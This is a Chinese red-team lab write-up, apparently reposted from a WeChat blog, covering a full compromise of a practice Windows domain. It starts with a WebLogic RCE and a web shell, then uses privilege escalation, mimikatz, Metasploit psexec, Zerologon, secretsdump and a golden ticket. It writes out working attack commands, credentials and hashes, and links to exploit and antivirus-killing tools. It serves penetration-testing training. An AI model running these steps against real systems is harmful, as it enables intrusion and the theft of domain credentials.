红队-二层网络下的域渗透攻防

admin 2024年3月5日18:28:43评论14 views字数 2420阅读8分4秒阅读模式

靶场链接:
https://www.codeprj.com/blog/d3ef831.html
靶机的统一初始密码是:1qaz@WSX

红队-二层网络下的域渗透攻防

这里模拟互联网为192,内网为10.10

外网打点:

红队-二层网络下的域渗透攻防

通过Kscan扫描看到该web应用是WebLogic

红队-二层网络下的域渗透攻防

通过WebLogic漏扫工具测试

红队-二层网络下的域渗透攻防

存在RCE漏洞,我们直接注入内存马

红队-二层网络下的域渗透攻防

红队-二层网络下的域渗透攻防

哥斯拉连接成功

红队-二层网络下的域渗透攻防

翻翻config文件夹

红队-二层网络下的域渗透攻防


红队-二层网络下的域渗透攻防

WebLogic的后台密码,不过是AES加密的,我们可以通过以下工具进行解密还原

https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi/releases/download/v2.0/WebLogicPasswordDecryptor.zip

红队-二层网络下的域渗透攻防

把解密需要的dat下载到本地

红队-二层网络下的域渗透攻防

weblogic/1qaz@WSX

红队-二层网络下的域渗透攻防

成功登录后台

通过该密码对mssql数据库看看是否是相同密码

红队-二层网络下的域渗透攻防

失败

红队-二层网络下的域渗透攻防

在哥斯拉中执行tasklist查询下是否存在杀软

红队-二层网络下的域渗透攻防

存在360进程

红队-二层网络下的域渗透攻防

在github中找了个GoLangBypassAV的免杀马

红队-二层网络下的域渗透攻防

上传哥斯拉后执行,反弹给MSF

红队-二层网络下的域渗透攻防

当前权限是administrator

试试模拟令牌未能获取system权限

红队-二层网络下的域渗透攻防

红队-二层网络下的域渗透攻防

由于存在360,不能getsystem并且BypassUAC也不行

尝试补丁提权法

红队-二层网络下的域渗透攻防

systeminfo后将其黏贴到查询网址

红队-二层网络下的域渗透攻防

红队-二层网络下的域渗透攻防

这台机器是2008,使用CVE-2018-8120进行提权

红队-二层网络下的域渗透攻防

红队-二层网络下的域渗透攻防

成功获取system权限

红队-二层网络下的域渗透攻防

这里使用Csharp加载驱动干掉杀软进程,基于@ZeroMemoryEx的Terminator项目写的一个C#版,可通过URL远程或本地加载方式干掉杀软。

地址:https://github.com/mertdas/SharpTerminator

红队-二层网络下的域渗透攻防

如果您收到“无法在受信任列表中注册进程!” 错误你应该手动添加服务:

sc create Terminator binPath= "C:pathtodriver.sys" type= kernel start= demand

红队-二层网络下的域渗透攻防

还是失败告终

红队-二层网络下的域渗透攻防

通过刚才的systeminfo发现我们这台web机器在域中

域信息收集:

net config Workstation查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user查看本机用户列表net user /domain查看域用户net localgroup administrators查看本地管理员组net view /domain查看有几个域net user 用户名 /domain获取指定域用户的信息net group /domain查看域里面的工作组,查看把用户分了多少组(只能在域控上操作net group 组名 /domain查看域中某工作组net group "domain admins" /domain查看域管理员的名字net group "domain computers" /domain查看域中的其他主机名net group "doamin controllers" /domain(然后ping 域控的域名获得IP地址)

红队-二层网络下的域渗透攻防

在de1ay域中,域控是DC,ping下获得域控IP

红队-二层网络下的域渗透攻防

加载mimikatz

红队-二层网络下的域渗透攻防

发现是x86的进程,需要进行进程迁移到64位的

红队-二层网络下的域渗透攻防

ps命令找到合适的64位,并且是system权限在运行着

红队-二层网络下的域渗透攻防

迁移成功,creds_all列举所有凭证,看到该administrator域管理员明文密码

将MSF建个稳定路由和Socks5(其实这步是多余的,打多成了习惯了,原谅)

红队-二层网络下的域渗透攻防

红队-二层网络下的域渗透攻防

红队-二层网络下的域渗透攻防

netbios探测存活主机,发现10.10.10.201这台PC

域横向移动:

红队-二层网络下的域渗透攻防

msf > use exploit/windows/smb/psexec

msf exploitwindows/smb/psexec) > set rhost 10.10.10.201

msf exploit(windows/smb/psexec)> set smbuser administrator

msf exploit(windows/smb/psexec)> set smbpass 1qaz@WSX

msf exploit(windows/smb/psexec)> set SMBDomain de1ay

msf exploit(windows/smb/psexec)> exploit

获得域成员PC机shell

横向域控制器

红队-二层网络下的域渗透攻防

不知道是什么原因没有创建会话

改为wmiexec.py横向AD

红队-二层网络下的域渗透攻防

老规矩,补丁查询法

红队-二层网络下的域渗透攻防

使用CVE-2020-1472置0漏洞攻击AD

https://codeload.github.com/shanfenglan/cve-2020-1472/zip/refs/heads/main

红队-二层网络下的域渗透攻防

成功将域控密码hash置空

proxychains4 python3 secretsdump.py de1ay/DC$@10.10.10.10 -no-pass

红队-二层网络下的域渗透攻防

成功-no-pass导出域内所有用户凭证

权限维持-黄金票据:

红队-二层网络下的域渗透攻防

我们回到刚刚的wmiexec横向AD后,使用该命令

wmic useraccount get name,sid

查询各域内用户的sid值,用于黄金票据的制作

制作黄金票据:

proxychains4 python3 ticketer.py -domain-sid S-1-5-21-2756371121-2868759905-3853650604 -nthash 82dfc71b72a11ef37d663047bc2088fb -domain de1ay.com administrator

其中该hash值是krbtgt的哈希值

红队-二层网络下的域渗透攻防

之后export导入票据到内存中即可

通过命令:

proxychains4 -q impacket-psexec  -k -no-pass -dc-ip 10.10.10.10 administrator@DC.de1ay.com -codec gbk

即可无密码连接域控,完成权限维持

End................................................

原文始发于微信公众号(513 Sec):红队-二层网络下的域渗透攻防

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月5日18:28:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队-二层网络下的域渗透攻防https://cn-sec.com/archives/2547433.html

发表评论

匿名网友 填写信息